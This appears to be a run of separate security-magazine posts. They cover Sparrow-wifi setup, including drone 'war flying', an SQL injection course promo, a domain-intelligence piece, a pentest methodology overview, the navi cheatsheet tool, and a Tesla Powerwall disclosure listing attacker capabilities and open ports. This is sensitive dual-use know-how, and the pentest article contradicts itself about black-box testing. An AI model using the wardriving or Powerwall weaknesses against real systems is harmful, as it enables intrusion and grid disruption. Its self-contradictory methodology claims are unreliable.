   • Blue Hydra installed into /opt/bluetooth/blue_hydra (mkdir /opt/bluetooth && cd /opt/bluetooth && git clone https://github.com/ZeroChaos-/blue_hydra.git). Then make sure you've followed the blue_hydra installation instructions. You can test it with bin/blue_hydra. This must be in /opt/bluetooth/blue_hydra or the app won't find it.

I strongly recommend running 'hcitool lescan' from the command-line first to make sure everything is working okay. If you have an Ubertooth, run ubertooth-specan-ui and run blue_hydra to make sure those tools work properly before attempting in sparrow-wifi.

Some troubleshooting tips:

• If you don't see any devices with a basic LE advertisement scan, try "hcitool lescan" from the command-line and see if you get any errors. If so address them there. Sometimes a quick "hciconfig hci0 down && hciconfig hci0 up" can fix it.
• If you have an Ubertooth and don't see any spectrum try running ubertooth-specan or ubertooth-specan-ui from the command line. If you get any errors address them there.

Spectrum

Near real-time spectral overlays in both spectrums is one feature that differentiates sparrow-wifi from other wifi tools. To get spectral overlays, two options are available. The less expensive approach is to use an Ubertooth One. Spectrum scanning is one of the features of the hardware with 1 MHz channel resolution. The downside is that Ubertooth is just focused on the 2.4 GHz spectrum (after all that's where bluetooth functions), so you won't be able to scan the 5 GHz range. If you have more experience and/or hardware focused on software-defined radio (SDR) and have a HackRF One available, while a little more expensive an option, you can scan both the 2.4 (with 0.5 MHz resolution) and 5 GHz (with 2 MHz resolution) spectrum ranges. The next 2 sections provide some details unique to each hardware device. In general the goal of sparrow-wifi were frame rates of about 10 fps local and 5 fps via the remote agent (depending on remote hardware and network connectivity).

The following screenshot shows a 2.4 GHz perspective with an Ubertooth spectrum (with 1 MHz bins) overlay. It's quite interesting to watch the spectrum when bluetooth devices are also active. You can observe the bluetooth channel hopping in the spectrum. There are other protocols such as zigbee and other IoT protocols, even cordless phones that may also show up in the 2.4 GHz spectrum that would not otherwise show up on a wifi-only view. Having the spectral overlay provides an invaluable perspective on other interference in the spectrum for troubleshooting say for instance if no overlapping wireless channels seem to be the source of poor connectivity.

Ubertooth One

Once you get an Ubertooth One, the first thing you should do is download and build the latest tools and flash it with the latest firmware version. With that in place, try running ubertooth-specan-ui for a nice quick graphical spectrum display. If this is working, the Ubertooth should work fine in sparrow-wifi (just close any running Ubertooth tools before attempting to display the spectrum). Sparrow-wifi will automatically detect that the Ubertooth is present and the tools are available on startup and enable the appropriate menu choices. Note that if you start sparrow-wifi without the Ubertooth connected, just close sparrow-wifi and reopen it and it should see it. You can manually test it with lsusb to see that the Ubertooth is present.

HackRF One

HackRF support has been added to take advantage of the hackrf_sweep capabilities added to the HackRF firmware. With a HackRF you can sweep the entire range for a view of the spectrum. While hackrf_sweep can sweep from 2.4 GHz through 5 GHz, the frame rate is too slow (like 1 frame every 2 seconds), so you can use it for only one band at a time. With that said, if you have both an Ubertooth and a HackRF, you could use the Ubertooth to display the 2.4 GHz band and the HackRF to display the 5 GHz band simultaneously.

IMPORTANT: Standard RF and antenna rules apply. If you want to monitor either band, make sure you have an antenna capable of receiving in that band (the standard telescoping HackRF antenna probably won't work as it's only rated up to 1 GHz). And if you do want to grab an external dual-band antenna used on wireless cards, just note that the connector polarity is typically reversed (rp-sma rather than the sma connector on the HackRF) so you'll need to grab an adapter to connect it to the HackRF (they're only a couple dollars on Amazon). An RP-SMA antenna will screw on to the SMA connector but the center pin isn't there so you won't actually receive anything. Just a word of caution.

Notes: The 5 GHz spectrum, even with a dual-band antenna can be difficult to see signals in the same way as in 2.4 GHz. The SNR for 5 GHz seems much lower than 2.4 GHz. Some of this could be attributed to the HackRF as 5 GHz is getting towards the edge of its useable frequency range, while part of it can also be attributed to 5 GHz not penetrating walls, ceilings, etc. as well as 2.4 GHz. Sometimes the 5 GHz band shows better in a waterfall plot to distinguish an active signal, but if that's what you need try the tool qspectrumanalyzer.

Troubleshooting tips:

• If you don't see any spectrum at all try running hackrf_sweep from the command-line. If you get any errors, address them there.

GPS

Sparrow-wifi relies on gpsd to provide standard GPS communications. During testing there were a number of GPS-related issues worth being aware of. First in terms of GPS receivers, make sure you get one that works with gpsd. I've tested it with a GlobalSAT ND-105C Micro USB receiver. I've also used a GPS app on an android device to provide GPS over bluetooth (although this takes some tinkering, and would preclude using the bluetooth adapter for scanning while using it for GPS).

So the first important note is on the GPS receiver side. If you are planning on using the GPS receiver indoors, you may need to make sure the GPS you get specifically states it will work indoors. Anyone with a Garmin or other outdoor sports GPS system may be aware that they tend to not synchronize with satellites well while indoors. The stock GPS on the Solo 3DR drone is the same way as is the GlobalSAT receiver. When they're close to windows, etc. they may finally sync up after some time, but reception indoors isn't great and if you're in an office building or other metal/concrete structure, the receiver may have a tough time receiving the satellite signals. So keep this in mind when picking a GPS receiver.

In terms of getting the receiver to work with gpsd, there were some challenges that were encountered getting it to work. First, the easiest way to test the gps is to stop the gpsd service (service gpsd stop), and run gpsd from the command-line with debugging enabled. If you have a USB-based GPS you should see a device that looks like /dev/ttyUSB0 show up when it is connected. If that's the case, a command similar to this would start gpsd in the foreground for a quick test:

gpsd -D 2 -N /dev/ttyUSB0

If you see good data, you can daemonize it by just removing the -N parameter. On Ubuntu, editing /etc/default/gpsd and specifically putting /dev/ttyUSB0 in the device parameter and restarting the service worked fine. However on Kali linux and the Raspberry Pi, the same process didn't work as if the gpsd service was ignoring the parameter. In those cases, the GPS service was set to not auto-start and the gpsd daemon was started manually from the command-line with the command 'gpsd /dev/ttyUSB0'.

Once the daemon is up and working, xgps is a tool that's part of the gpsd-clients package that provides a really nice GUI to check GPS and satellite status. If you run xgps it will tell you when the receiver is synchronized and give you a number of other parameters to make sure it is working correctly. If everything looks like it's working with xgps, then sparrow-wifi should be able to pull the data as any other gpsd client would.

Running sparrow-wifi remote agent

Because the agent has the same requirements as the GUI in terms of system access, you will need to run the agent as root as well. Simply run:

sudo ./sparrowwifiagent.py

By default it will listen on port 8020. There are a number of options that can be seen with --help, and a local configuration file can also be used.

An alternate port can also be specified with:

sudo ./sparrowwifiagent.py --port=<myport>

There are a number of options including IP connection restrictions and record-local-on-start. Here's the --help parameter list at this time:

usage: sparrowwifiagent.py [-h] [--port PORT] [--allowedips ALLOWEDIPS]
                           [--mavlinkgps MAVLINKGPS] [--sendannounce]
                           [--userpileds] [--recordinterface RECORDINTERFACE]
                           [--ignorecfg] [--cfgfile CFGFILE]
                           [--delaystart DELAYSTART]

Sparrow-wifi agent

optional arguments:
  -h, --help            show this help message and exit
  --port PORT           Port for HTTP server to listen on
  --allowedips ALLOWEDIPS
                        IP addresses allowed to connect to this agent. Default
                        is any. This can be a comma-separated list for
                        multiple IP addresses
  --mavlinkgps MAVLINKGPS
                        Use Mavlink (drone) for GPS. Options are: '3dr' for a
                        Solo, 'sitl' for local simulator, or full connection
                        string ('udp/tcp::' such as:
                        'udp:10.1.1.10:14550')
  --sendannounce        Send a UDP broadcast packet on the specified port to
                        announce presence
  --userpileds          Use RPi LEDs to signal state. Red=GPS
                        [off=None,blinking=Unsynchronized,solid=synchronized],
                        Green=Agent Running [On=Running, blinking=servicing
                        HTTP request]
  --recordinterface RECORDINTERFACE
                        Automatically start recording locally with the given
                        wireless interface (headless mode) in a recordings
                        directory
  --ignorecfg           Don't load any config files (useful for overriding
                        and/or testing)
  --cfgfile CFGFILE     Use the specified config file rather than the default
                        sparrowwifiagent.cfg file
  --delaystart DELAYSTART
                        Wait  seconds before initializing

Drone / Rover Operations

Being able to "war fly" (the drone equivilent of "wardriving" popular in the wifi world) was another goal of the project. As a result, being able to have a lightweight agent that could be run on a small platform such as a Raspberry Pi that could be mounted on a drone was incorporated into the design requirements. The agent has been flown successfully on a Solo 3DR drone (keeping the overall weight under the 350 g payload weight).

The Solo was a perfect choice for the project because the controller acts as a wifi access point and communicates with the drone over a traditional IP network using the mavlink protocol. This allows other devices such as laptops, tablets, and the Raspberry Pi to simply join the controller wifi network and have IP connectivity. This was important for field operations as it kept the operational complexity down.

Because these drones have onboard GPS as part of their basic functionality, it's possible over mavlink (with the help of dronekit) to pull GPS coordinates directly from the drone's GPS. This helps keep the overall payload weight down as an additional GPS receiver does not need to be flown as part of the payload. Also, in order to keep the number of tasks required by the drone operator to a minimum during flight, the agent can be started, wait for the drone GPS to be synchronized, use the Raspberry Pi lights to signal operational readiness, and automatically start recording wifi networks to a local file. The GUI then provides an interface to retrieve those remotely saved files and pull back for visualization.

This scenario has been tested with a Cisco AE1000 dual-band adapter connected to the Pi. Note though that I ran into an issue scanning 5 GHz from the Pi that I finally found the solution for. With a dual-band adapter, if you don't disable the internal Pi wireless adapter you won't get any 5 GHz results (this is a known issue). What you'll need to do is disable the onboard wifi by editing /boot/config.txt and adding the following line then reboot 'dtoverlay=pi3-disable-wifi'. Now you'll be able to scan both bands from the Pi.

The quickest way to start the agent on a Raspberry Pi (IMPORTANT: see the Raspbery Pi section first, if you're running Raspian Squeeze, you'll need to build Python 3.5 first (Stretch already has 3.5) to run the agent since the subprocess commands used were initially removed from python3 then put back in 3.5) and pull GPS from a Solo drone is to start it with the following command on the Pi:

sudo python3.5 ./sparrowwifiagent.py --userpileds --sendannounce --mavlinkgps 3dr

The Raspberry Pi red and green LED's will then be used as visual indicators transitioning through the following states:

1. Both lights off - Initializing
2. Red LED Heartbeat - Connected to the drone (dronekit vehicle connect was successful)
3. Red LED Solid - Connected and GPS synchronized and operational (the drone can take a couple of minutes for the GPS to settle as part of its basic flight initialization)
4. Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests

Note: Without the mavlink setting, if using a local GPS module, the red LED will transition through the same heartbeat=GPS present but unsynchronized, solid = GPS synchronized states.

If you don't have a second set of hands while flying your drone and want to fly the Pi without having to worry about the agent, you can start the agent in auto-record mode. There are a few scripts in the scripts directory that start with 'rpi' that can be scheduled for monitoring the agent and starting it as appropriate. The overall intention is a headless configuration where the Pi starts up (you'll need to configure the wifi on the Pi ahead of time to automatically connect to the controller wifi network), the agent will be started and automatically go into wifi record mode using the drone's gps for recording. Once you're done the sparrow-wifi agent menu gives you a screen to manage the files in the recordings directory on the agent and download or delete the files there. These scripts in the scripts directory are just samples. It is highly recommended that you customize them and the Pi integration to meet your specific needs, and by all means keep safety (and federal regulations) in mind when doing anything with a drone as you're responsible for both.

Raspberry Pi Notes

Raspbian Stretch

Raspbian Stretch now includes the correct version of Python, so no more custom python builds. The only thing that has to be custom handled is that PyQTChart is not in the apt repository or available via pip to build on raspbian. However, thanks to folks over at this thread: https://github.com/mu-editor/mu/issues/441, I've been able to reproduce their pyqtchart build process on Raspbian Stretch. So to make everyone's life easier, there's now a script included with the project called rpi.setup_prerequisites.sh. Sudo that script first, then Sparrow "should" work for you. I tested it on a Pi 3B board with the 7" touchscreen and it works great.

Raspbian Jesse

You can run the remote agent on a Raspberry pi, however the installation requirements are a bit different. First, Python3 did not include some of the subprocess module capabilities in the initial 3.x versions prior to 3.5. However they did put them back in from 3.5 forward. In terms of Raspian builds, Raspbian Squeeze only has Python 3.4.x in the repository. So the first step will be to download and build Python 3.5. However if you're running on Debian Stretch (the latest as of now), you can skip the 3.5 build. The repositories do have Python 3.5.

You can use the following sequence to build python if you need to (you will need to apt-get install libsqlite3-dev prior to building Python since it's built in at compile time now):

sudo apt-get install libsqlite3-dev

cd /tmp
wget https://www.python.org/ftp/python/3.5.5/Python-3.5.5.tgz
tar -zxvf Python-3.5.5.tgz
cd Python-3.5.5
./configure && make -j3 && sudo make install

Once that is done, install the necessary modules into the 3.5 build: sudo pip3.5 install gps3 dronekit manuf python-dateutil

Then you can run the agent directly with commands like this:

/usr/local/bin/python3.5 ./sparrowwifiagent.py

/usr/local/bin/python3.5 ./sparrowwifiagent.py --mavlinkgps=3dr --recordinterface=wlan0

Note that if you forget to specifically start them with 3.5 you will get an exception thrown since a subprocess function will be missing.

Another important note about using dual band USB wireless adapters on the Raspberry Pi (tested on a Pi 3), is that as long as the internal wireless is enabled, Raspbian won't see the 5 GHz band.

Add this line in your /boot/config.txt to disable the internal wireless, then your dual-band USB wireless will be able to see the 5 GHz band:

dtoverlay=pi3-disable-wifi

The red and green LED's are also used on the Raspberry Pi to provide some visual feedback:

1. Both lights off - Initializing
2. Red LED Heartbeat - gpsd found but unsynchronized (red light will stay off if gpsd is not installed or not running)
3. Red LED Solid - gpsd receiver synchronized
4. Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests

Download tool and support the author: https://github.com/ghostop14/sparrow-wifi 

The post Sparrow-Wifi: Next-Gen GUI-based WiFi And Bluetooth Analyzer For Linux appeared first on Hakin9 - IT Security Magazine.

In this video from our  Secure Coding with PHP online course our instructor Munir will show you how badly coded PHP applications become vulnerable to SQL injection attacks - in this specific example, we will be looking at using information schema to retrieve data. If you want to know how to prevent and/or fix it, join the course, it's all there :). For now though, dive into the video!

With this course, if you're a security professional, it will make you more efficient and resourceful in expediting your security reviews on PHP applications. If you are a developer, you will become better at creating secure software rather than just functional software. 

In this course, we start with concepts of PHP and what it has to offer. We learn how to structure applications and consider fundamentals when designing an application. You need to have a solid base to later on ensure everything is nice and secured, and it is helpful to know how developers work if you want to review their code. We also look at various good practices in regard to PHP coding and benchmark them against the top 10 threats to web applications to see how to effectively build bullet proof applications. You don't want to get stuck with code vulnerable to one of the OWASP Top 10, such as a simple SQL injection, do you? Finally, we get exposed to various tools and techniques that can be used to enable us to analyze and fix a majority of our PHP applications. 

What will this course give you? 

• It will get you up and running with the key concepts of PHP development and application protection. 
• It will give you practical implementation of secure PHP development using different tools and techniques. 
• You will master the art of detecting, mitigating, fixing, and preventing defects in PHP applications.
• You will also learn the tricks to countering scanners in PHP development. 

You will be able to confidently speak about: 

• Fundamentals of PHP development.
• Various application protection techniques.
• Using various tools to analyse and defend against attacks to applications. 
• Fixing known bugs in PHP applications. 

Tools you’ll get familiar with: 

• Github
• Notepad++ / Visual studio IDE
• OWASP SKF
• Phar-based static analysis tools 
• XAMPP/WAMPP/LAMPP

Check out the course:

Secure code development in PHP (W49)

The post SQL Injection attacks - using information schema to retrieve data [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.

According to the World Intellectual Property Organization (WIPO), the volume of cybersquatting cases grew by as much as 12% in 2018, the highest in years. The introduction of more than 1,200 new gTLDs was believed to have widened cybersquatters’ playing field. The implementation of stricter data privacy regulations was also said to have a role in the rise in the number of anonymously registered domain names that potentially allowed cybersquatters to evade trademark owners’ prying eyes.

Meanwhile, the number of phishing attacks seen in the second quarter of 2019 eclipsed the volumes seen in the past three quarters. The total number of phishing sites detected by the Anti-Phishing Working Group (APWG) from April to June 2019 reached 182,465. Things turn for the worse when phishing attacks lead to a massive data breach, as we’ve seen happen several times. To date, each data breach incident can cost a company an average of US$3.92 million.

Organizations also faced 34% more DNS attacks compared to 2018, which could cost them an average of US$1.07 million in remediation on top of business downtime.

All that said, companies cannot rely on merely reacting to attacks; they need to ensure proactive protection by ensuring the security of their entire domain infrastructure. Whether they rely on an in-house or a third-party security provider, they can benefit from domain intelligence.

Improving Cybersecurity Posture with Data Enrichment

Organizations that have an in-house IT security team can safeguard their domains by:

• Empowering security operations center (SOC) staff: Domain intelligence can provide SOCs with context and possibly attribution for the threat data they analyze. Using a reverse WHOIS API, for instance, allows them to conduct in-depth investigations on who owns a domain listed as an indicator of compromise (IoC) for an attack. Knowing that points to a specific adversary that they need to monitor for future attempts, thus avoiding compromise.
• Enriching security information and event management (SIEM) solutions: Organizations can integrate domain intelligence into their SIEM solutions for faster threat identification. In short, security teams can feed IP, URL, and other domain data into their solutions so these can easily compare IoCs with log information to pinpoint and block all potential threat sources before these can do harm. This approach improves alert triage, but only if the domain intelligence source is accurate and regularly updated.
• Enabling penetration testing with a security orchestration, automation, and response (SOAR) platform: Not all organizations have the resources to conduct penetration testing, which is a leading cause of cyber-attack unpreparedness. Most do not have the experts to perform such tests given the current IT talent shortage. That should not be an issue these days, however, with the introduction of SOAR platforms that can automate activities such as asset discovery scans, classification activities, and target prioritization, making it possible for security teams to operationalize their penetration testing efforts.

Those that rely on third-party service providers to beef up their cyber defense can also benefit from domain intelligence.

• Managed security service providers (MSSPs): An efficient MSSP should be able to detect and prevent an attack before it can do damage as well as identify the characters behind an intrusion attempt with their email addresses, domains, and other information from WHOIS records. Learning about a domain’s reputation, for instance, can block access from a disreputable domain that could have ties to an ongoing attack, thus thwarting it in its tracks.
• Managed detection and response (MDR) service providers: MDR teams can rely on WHOIS and DNS databases to answer questions relevant to their role, such as:

- Are the communications that reach client networks coming from potentially spoofed email addresses?

- Are specific categories of top-level domain (TLD) names often misused for fraud?

- Are there patterns among domain records that may help uncover large-scale criminal networks?

Cybercriminals are continuously enhancing tried-and-tested tools and tactics to inflict damage, and organizations with weak or inadequate defenses often end up their victims. Companies need to enrich their threat intelligence to block threats from the source and make sure their domains are not being used for malicious activities.

About the Author

Jonathan Zhang is the founder and CEO of Threat Intelligence Platform (TIP)—a data, tool, and API provider that specializes in automated threat detection, security analysis, and threat intelligence solutions for Fortune 1000 and cybersecurity companies. TIP is part of the Whois XML API family, a trusted intelligence vendor by over 50,000 clients.

The post Domain Intelligence for Proactive Threat Defense by Jonathan Zhang appeared first on Hakin9 - IT Security Magazine.

Did you know that the figures of cyber-attacks have increased extensively from the last decade? Along with this, Advanced Persistent Threats (APT), Ransomware attacks and insider threats are also becoming a part of the conversation. By keeping the increased number of cyber-attacks in mind, the corporate sectors have started paying attention to the security testing of its software applications and products. 

By the completion of this post, you will be aware of the leading methodologies concerning software security testing. But, before that, if you belong from a non-technical background, you should know about the professional who handles the workload or responsibility of security testing of software applications.

Some Eye-Opening Stats Regarding Cyber-Attacks:

Undoubtedly, the cyber security industry is growing continuously and rapidly. Corporate sectors are spending more and more on the resources to defend against cyber-attacks.

According to a survey result, 95% of breached records came from the industries related to Government, retail, and technology. 

According to the University of Maryland, a hacker attack takes place after every 39 seconds. 

64% of the companies have experienced web-based cyber-attacks, out of which 43% are small businesses.

In 2013, approximately 3,809,448 records stolen from breach every day, and this number jumped by 126% until the year 2017. 

According to a study examined, 75% of the healthcare industries are more infected by malware, according to last year's report. All the above stats proves the importance of cyber security for website and software application, no way to let them loose on security factors.

Unlock The Responsibilities of a Professional Penetration Tester & Process of Penetration Testing:

Well, a penetration tester is a professional who takes care of all security testing concerns related to software applications. Penetration testing is one of the most recommended and highly supported techniques used by the penetration testers to recognize the vulnerable areas of the system. 

Penetration testing includes willful attacks on the network to distinguish the weak areas, which offers a way to the unofficial users for assaulting the system and altering their integrity and fidelity. Also, penetration testing assists in fixing numerous security bugs and loopholes. Conversely, it is not only fruitful but also essential for the companies to perform penetration testing to identify potential vulnerabilities to keep the security posture of the software applications tight.

Once the penetration testers identify the vulnerabilities, it can be utilized to gain access to sensitive information. Security parameters that remain uncovered during the Penetration Testing are then delivered to the system owner along with the accurate potential assessment that impacts the entire organization.

Effective Penetration Testing:

Now the question arises - What is ideal Penetration Testing? Well, effective Penetration testing helps in evaluating the gaps in the security tools that a company is using. Also, it helps in finding the multiple attack vectors as well as misconfigurations. Apart from this, Penetration testing also helps in the prioritization and fixation of the risks along with the improvement of the overall security response time.

Furthermore, Penetration Testing helps in evaluating the capacity of the system to defend against sudden malicious attacks. Following are some of the most common reasons behind system vulnerability:

• Designing Errors
• Settings and Configuration Mismatch
• Network connectivity
• Human-induced error
• Communication
• Complexity

Significant Steps Involved in Penetration Testing:

Before I pursue further, let me introduce you to the significant steps that take part in the process of Penetration testing. Following are some of the vital penetration tester steps involved in leading methodologies used by a penetration tester:

1. First of all, you need to determine the feasibility of a particular set of attack vendors.
2. Secondly, you have to identify the risk vulnerabilities that emerge from the combination of lower-risk vulnerabilities, dried up in a specific sequence.
3. Next, you need to figure out the vulnerabilities that are difficult to detect with automated network applications. 
4. Subsequently, you need to access the magnitude of the potential business and operational results of successful attacks.
5. The next important thing that you need to do is to provide the evidence to support the increased personnel and technological security investment.

Nowadays, Penetration Testing is the backbone of most of the IT companies. Penetration testing is spreading its wings, and its impact can be seen clearly in the inter-departmental matters like social engineering, web application security, and physical penetration testing.

However, there are throngs of penetration testing tools that are convenient to use. These tools are not only convenient to use but also easy to deploy and configure. Moreover, you need to keep in mind that the tools should follow the methodology that supports the vulnerabilities to be categorized on the basis of severity that needs to be fixed immediately. Most importantly, Penetration Testing tools should allow automated verification of vulnerabilities to save time and diminish human errors.

Popular Penetration Testing Tools:

The following are some of the popular Penetration testing tools that are supported by numerous Penetration testers around the world:

• Acunetix
• Aircrack-ng
• Cain & Abel
• Ettercap
• John the ripper
• Metasploit
• Nessus
• Kismet
• Wireshark

How to Perform Penetration Testing?

Now the question arises - How to perform Penetration Testing? Well, there are three main approaches to performing Penetration Testing, i.e., Manual Penetration Testing, Automated Penetration Testing, and Manual + Automated Penetration Testing. Now let us discuss each strategy one by one so that you can get a better understanding regarding the same.

Manual Penetration Testing: 

Manual Penetration Testing includes a standard approach in which various activities performed in a sequence. In Manual Penetration Testing, following are some of the activities that are presented in a series:

• Penetration testing planning
• Reconnaissance
• Vulnerability Analysis
• Exploitation
• External attacks
• Internal attacks
• Post Exploitation
• Reporting

Automated Penetration Testing:

When it comes to Automated Penetration Testing, we can say that it can be performed by making the use of several performance testing tools. Following are some of the highly used tools during Automated penetration testing:

• NMap
• Nessus
• Metasploit
• Wireshark
• Veracode 

Manual + Automated Penetration Testing:

This is the combination of Manual and Automated Penetration Testing. If we talk about the purpose of this approach, it makes sure that the testing is useful, monitored, and precise penetration testing.

Methodologies of Penetration Testing:

We can describe the methods of Penetration Testing on the basis of testing approaches. Following are some of the methods of Penetration Testing:

Black Box Penetration Testing: 

Unlike Gray Box penetration testing, a high-level of information is made available to the tester when it comes to Black box penetration testing. In black-box penetration testing, the tester has zero internal knowledge of the target system. Moreover, it determines the system vulnerabilities, exploited from outside the network. Black-box penetration testing relies on a dynamic analysis approach. Furthermore, these testers also need to be proficient in developing their target map on the basis of the observations.

Gray Box Penetration Testing:

Gray box Penetration testing only makes limited information available to the tester to attack the system externally. Gray box testing is one level up from black-box testing. Moreover, Gray-box penetration testers are aware of the network’s internals, including design and architecture. The purpose of gray-box penetration testing is to provide a more focused network security assessment.

White Box Penetration Testing:

In this method of Penetration Testing, the tester has complete access and in-depth system knowledge that needs to be tested. This methodology is exceptionally fruitful when it comes to extensive penetration testing.

It is also known as clear-box, open-box, auxiliary, and logic-driven testing. The challenges that need to deal with white-box testing includes the sorting of massive data available to identify potential points of weakness to make it the most time-consuming type of penetration testing.

Dissimilar to black-box and gray-box penetration testing, white-box penetration testers can perform static code analysis, which makes it familiar with source code analyzers, debuggers, and other significant tools required for this sort of testing. Furthermore, White-box penetration testing also offers a complete assessment of both internal and external vulnerabilities, and this makes it the best when it comes to calculation testing.

Some Other Penetration Testing Methodologies:

Data Collection: 

No doubt, there are several methods that you can use to reach the target system data. Although, web page source code analysis is also a sound technique to catch more information regarding the target system data, software, and plugin versions. Apart from this, there is a collection of free tools and services that you can use to get the information concerning database, table names, software versions, and hardware used by multiple third-party plugins.

Vulnerability Assessment:

Based on the data collected, security vulnerability can be addressed quickly. It assists the penetration testers to launch attacks by making the use of identified entry points in the system.

Actual Exploit:

This is the most critical step. It demands special skills and techniques to configure attacks on the targeted system. Moreover, experienced and veteran testers can make the use of their skills and experience to launch an attack on the system network. 

Result Analysis and Report Development:

Once the penetration tests are done, the next step involves the preparation of detailed reports carrying corrective actions. All the recognized vulnerabilities and recommended restorative methods are needed to be listed in this report. Moreover, you can customize the vulnerability report in the following formats: 

• HTML
• XML
• MS Word
• PDF

About the Author:

Claire Mackerras is a Senior QA Engineer & Editor associated with Bugraptors. A certified software testing company with extensive experience as a third-party testing vendor in US. She is passionate about writing on technological trends for manual & automation software testing.  She likes to share her knowledge, for the readers who are interested in exploring testing tact’s and trends.

The post Leading Methodologies Used by a Penetration Tester by Claire Mackerras appeared first on Hakin9 - IT Security Magazine.

navi allows you to browse through cheatsheets (that you may write yourself or download from maintainers) and execute commands, with argument values prompted to you.

— How to run that command again?
— Oh, it's not in my shell history
— Geez, it's almost what I wanted but I need to change some args

Installation

Using Homebrew or Linuxbrew

You can use Homebrew or Linuxbrew to install navi:

brew install denisidoro/tools/navi

Using git

Alternatively, you can git clone this repository:

git clone --depth 1 https://github.com/denisidoro/navi /opt/navi
cd /opt/navi

# to install in your $PATH
sudo make install 

# to install in an arbitrary folder
./scripts/install /some/path

# install fzf
# refer to https://github.com/junegunn/fzf

Using oh-my-zsh

Make sure that your oh-my-zsh $ZSH_CUSTOM directory is configured, then clone navi into the plugins directory.

plugins_dir="$ZSH_CUSTOM/plugins"
mkdir -p "$plugins_dir"
cd "$plugins_dir"
git clone https://github.com/denisidoro/navi

Then, add it to the oh-my-zsh plugin array to automatically enable the zsh widget:

plugins=(docker tmux fzf navi)

Lastly, reload your zshrc or spawn a new terminal to load navi. Once this is done, you should be able to use it as a shell widget with no additional setup.

Please note that when installing as an oh-my-zsh plugin, navi will not be available as a command. If you also want to be able to run the command interactively, you will need to do one of the following:

• Install it to /usr/bin/local (via sudo make install)
• Manually set $PATH so that navi can be found.

You can manually update your path by adding a line like this in your .zshrc:

export PATH=$PATH:"$ZSH_CUSTOM/plugins/navi"

And verify that it works by running which navi after reloading your configuration.

Upgrading

navi is being actively developed and you might want to upgrade it once in a while. Please follow the instruction below depending on the installation method used:

# brew
brew upgrade navi

# git or oh-my-zsh
cd "$(navi home)"
git pull

Usage

By simply running navi you will be prompted with the default cheatsheets.

Preventing execution

If you run navi --print, the selected snippet won't be executed. It will be printed to stdout instead.

Pre-filtering

If you run navi query <cmd>, the results will be pre-filtered.

Searching online repositories

If you run navi search <cmd>, navi will try to download cheatsheets from online repositories as well.

Please note that these cheatsheets aren't curated by navi's maintainers and should be taken with a grain of salt. If you're not sure about executing these snippets, make sure to check the preview window or use the --print option.

Shell widget

You can use navi as a widget to your shell. This way, your history is correctly populated and you can edit the command as you wish before executing it.

In order to use it, add this line to your .bashrc-like file:

# bash
source "$(navi widget bash)"

# zsh
source "$(navi widget zsh)"

# fish
source (navi widget fish)

By default, Ctrl+G is assigned to launching navi. If you want to change the keybinding, replace the argument of bind or bindkey in the widget file.

If you want a widget for other shells, please upvote this issue.

More options

Please refer to navi --help for more details.

Trying out online

If you don't have access to bash at the moment and you want to live preview navi, head to this playground. It'll start a docker container with instructions for you to install and use the tool. Note: login required.

Motivation

The main objectives are:

• to increase discoverability, by finding snippets given keywords or descriptions;
• to prevent you from running auxiliar commands, copying the result into the clipboard and then pasting into the original command;
• to easily share one-liners with others so that they don't need to figure out how to write the commands;
• to improve terminal usage as a whole.

Sure, you can find autocompleters out there for all your favorite commands. However, they are very specific and each one may offer a different learning curve.

Or you can launch a browser and search for instructions on Google, but that takes some time.

navi, on the other hand, intends to be a general purpose platform for bookmarking any snippet at a very low cost.

Cheatsheets

Using your own custom cheatsheets

In this case, you need to pass a :-separated list of separated directories which contain .cheat files:

navi --path "/folder/with/cheats"

Alternatively, you can set an environment variable in your .bashrc-like file:

export NAVI_PATH="/folder/with/cheats:/another/folder"

Submitting cheatsheets

Feel free to fork this project and open a PR for me to include your contributions.

Cheatsheet syntax

Cheatsheets are described in .cheat files.

Syntax overview

• lines starting with % should contain tags which will be added to any command in a given file;
• lines starting with # should be descriptions of commands;
• lines starting with $ should contain commands that generate a list of possible values for a given argument;
• all the other non-empty lines are considered as executable commands.

For example, this is a valid .cheat file:

% git, code

# Change branch
git checkout 

$ branch: git branch | awk '{print $NF}'

Variables

The interface prompts for variable names inside brackets (eg <branch>).

Variable names should only include alphanumeric characters and _.

The command for generating possible inputs can refer other variables:

# If you select 2 for x, the possible values of y will be 12 and 22
echo  

$ x: echo -e '1\n2\n3'
$ y: echo -e "$((x+10))\n$((x+20))"

Table formatting

You can pick a specific column of a selection and set the number of lines considered as headers:

# This will pick the 3rd column and use the first line as header
docker rmi 

$ image_id: docker images --- --column 3 --headers 1

List customization

Lists can be stylized with the $FZF_DEFAULT_OPTS environment variable. This way, you can change the color scheme, for example.

In addition:

• the --fzf-overrides option allows you to hide columns, for example
• the --col-widths option allows you to limit column widths

Please refer to navi --help for more details.

Related projects

There are many similar projects out there (bro, eg, cheat.sh, tldr, cmdmenu, cheat, beavr, how2 and howdoi, to name a few).

Most of them provide excellent cheatsheet repositories, but lack a nice UI and argument suggestions.

In any case, navi has the option to search for some of these repositories.

Support the project and author: https://github.com/denisidoro/navi#motivation

The post navi - An interactive cheatsheet tool for the command-line appeared first on Hakin9 - IT Security Magazine.

The Tesla Powerwall 2 (PW) is a battery storage solution. It is often installed in combination with photovoltaic solar panels (PVs). The PW will store the PV generated power during daytime when the sun is shining and make the power available to the house when the sun is not shining. The PW can store up to 13.5kW of electric power and load/unload it at 5kW (7kW peak US / 5kW peak in the UK).

Twitter: @hackerschoice
eMail: root at thc.org

EXECUTIVE SUMMARY

1. GUI wide open.
2. Default password on WiFi and management interface
3. Attacker can cause financial damage to consumer
4. Attacker can dump entire PW Load into the grid at once
5. Attacker can oscilate between CHARGING and DUMPING (microseconds, the poor sub-station!)
6. Attacker can change grid codes.

Components: The Gateway (GW) consists of a Single Board Computer (SBC) and an energy meter (Neurio).

The SBC is custom built by WinSystems Inc and is called the G400.

The Neurio energy meter is the W1 module. It connects to the SBC via WiFi.

RS-485 is used to communicate between the SBC and the battery. Up to 10 batteries can be connected to a single GW (daisy-chain).

The research is based on GUI firmware 1.10.2 and internal firmware Tesla-0.0.7

The GW can be configured to connect via Ethernet, GSM and Wifi to the Internet/Tesla-HQ. The Internet connection is used for firmware updates and for Tesla to fiddle with your PW. Tesla has unrestricted and remote management capability.

Download: tesla-pw-gw.jpg
Download: tesla-pw-gw-front.jpg

22/tcp open  ssh (SSH-2.0-OpenSSH_7.2)
80/tcp open  http (PW UI running here)
8306/tcp  open  Welcome to Model S hec-updater ONLINE Built for Package Version: 17.23.0 (up 28754.018395333s)
